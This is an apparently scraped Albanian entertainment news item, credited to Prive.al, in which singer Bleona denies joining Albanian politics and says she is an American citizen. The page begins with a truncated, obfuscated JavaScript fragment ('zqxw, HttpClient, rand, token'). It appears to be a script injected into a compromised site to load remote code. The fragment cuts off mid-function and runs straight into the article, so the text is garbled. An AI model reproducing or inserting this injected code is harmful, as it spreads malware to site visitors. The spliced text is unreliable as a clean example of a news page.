;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Bleona mohon se po i bashkohet politikës shqiptare: “Jam qytetare amerikane”

By

Së fundmi, përhapën artikuj ku pretendohej se Bleona Qereti është një ndër emrat e kandidatëve për anëtarë të Këshillit Kombëtar të Partisë Demokratike në Kuvendin e Sali Berishës.

Bleona ka postuar një foto të saj në Instagram dhe ka theksuar se pavarësisht dashurisë për Shqipërinë, ajo është qytetare amerikane prandaj nëse do të punonte për një qeveri, do të ishte vetëm për qeverinë e Shteteve të Bashkuara të Amerikës.

“Edhe pse kam lindur në Shqipëri, unë jam qytetare amerikane! E dua Shqipërinë por jam besnike ndaj Shteteve të Bashkuara të Amerikës – vendit tim! Nëse do të punoja ndonjëherë për një qeveri, do të punoja vetëm për qeverinë e Shteteve të Bashkuara të Amerikës!”, shkruan Bleona. /Prive.al

View this post on Instagram

A post shared by B L E O N A (@bleona)

Artikuj të ngjashëm